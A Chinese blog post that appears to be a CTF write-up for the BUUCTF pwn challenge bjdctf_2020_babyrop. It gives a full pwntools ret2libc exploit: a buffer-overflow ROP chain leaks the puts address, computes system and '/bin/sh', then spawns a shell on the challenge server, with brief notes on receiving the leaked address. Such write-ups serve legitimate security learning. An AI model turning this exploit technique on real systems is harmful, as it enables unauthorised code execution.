关于BUUCTF 之bjdctf_2020_babyrop的wp的最实在解释

这篇博客展示了如何使用Python的`os`和`pwn`库来实现远程服务器的内存操作,包括发送payload修改内存地址,获取`puts`函数地址,计算`system`和`bin/sh`地址,并执行系统命令。关键步骤包括构造payload,发送数据,以及交互接收返回信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

from os import system
from pwn import*
context.log_level='debug'
p=remote('node4.buuoj.cn',25535)
libc_ = ELF('./libc-2.23.so')
elf = ELF('./2020')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
#p.recvuntil("Pull up your sword and tell me u story!")
#p.recv(3)
paylaod = 'a'*0x28 + p64(0x400733 )+p64(puts_got) +  p64(puts_plt)    +  p64(0x4006ad)  
p.sendline(paylaod)
p.recv()#this is important because of it ,the flag can be get
addr_=u64(p.recv(6).ljust(8,'\x00'))
#addr_=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))

print(hex(addr_))
base_=addr_-libc_.symbols['puts']
system_=base_ + libc_.symbols['system']
bin_=base_+libc_.search('/bin/sh').next()
pay = 'a'*0x28 + p64(0x400733) +p64(bin_) + p64(system_)
#p.recv(3)
#p.recvuntil("Pull up your sword and tell me u story!")
p.sendline(pay)
p.interactive()

这里addr_=u64(p.recv(6).ljust(8,'\x00'))这一句这个之所以这样写:我们首先来看接收到的write的地址,利用print(hex(addr_))的两种结果:
1:在这里插入图片描述
2:利用print((addr_))的结果:
在这里插入图片描述
通过以上两种输出我们可以看到,这个选着接收6个字符是由地址的16进制形式,这里是:0x7f4cb1e36690数一下可以发现是6个字节

另外本题还需要注意的是利用context.log_level='debug'时,再gdb里观察可以发现和远程程序交流的收、发数据情况,由此正确使用p.recv语句。关于题目的思路其余师傅的wp讲的很清楚,正常解法。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值